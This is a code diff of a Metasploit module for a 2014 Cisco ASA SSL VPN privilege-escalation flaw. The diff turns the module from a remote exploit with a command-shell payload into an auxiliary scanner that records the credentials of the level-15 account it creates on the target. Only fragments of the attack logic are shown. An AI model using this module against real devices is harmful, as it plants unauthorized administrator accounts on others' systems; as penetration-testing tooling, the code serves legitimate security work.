55
66require 'msf/core'
77
8- class Metasploit3 < Msf ::Exploit :: Remote
8+ class Metasploit3 < Msf ::Auxiliary
99 Rank = ExcellentRanking
1010
1111 include Msf ::Exploit ::Remote ::HttpClient
12- include Msf ::Auxiliary ::CommandShell
12+ include Msf ::Auxiliary ::Report
13+ include Msf ::Auxiliary ::Scanner
1314
1415 attr_accessor :ssh_socket
1516
@@ -33,25 +34,6 @@ def initialize(info = {})
3334 [ 'URL' , 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-asa' ] ,
3435 [ 'URL' , 'https://www3.trustwave.com/spiderlabs/advisories/TWSL2014-005.txt' ]
3536 ] ,
36- 'Targets' => [ [ 'Automatic' , { } ] ] ,
37- 'DefaultOptions' =>
38- {
39- 'ExitFunction' => "none"
40- } ,
41- 'Payload' =>
42- {
43- 'Compat' => {
44- 'PayloadType' => 'cmd_interact' ,
45- 'ConnectionType' => 'find'
46- }
47- } ,
48- 'Platform' => 'unix' ,
49- 'Arch' => ARCH_CMD ,
50- 'Targets' =>
51- [
52- [ 'Cisco ASA' , { } ] ,
53- ] ,
54- 'Privileged' => true ,
5537 'DisclosureDate' => "April 9, 2014" ,
5638
5739 ) )
@@ -296,7 +278,20 @@ def exploit
296278
297279 if creds
298280 print_good ( "#{ peer } - Successfully added level 15 account #{ creds . join ( ", " ) } " )
299- break
281+
282+ user , pass = creds
283+
284+ report_hash = {
285+ :host => rhost ,
286+ :port => rport ,
287+ :sname => 'Cisco ASA SSL VPN Privilege Escalation' ,
288+ :user => user ,
289+ :pass => pass ,
290+ :active => true ,
291+ :type => 'password'
292+ }
293+
294+ report_auth_info ( report_hash )
300295 else
301296 print_good ( "#{ peer } - Failed to created user account" )
302297 end
0 commit comments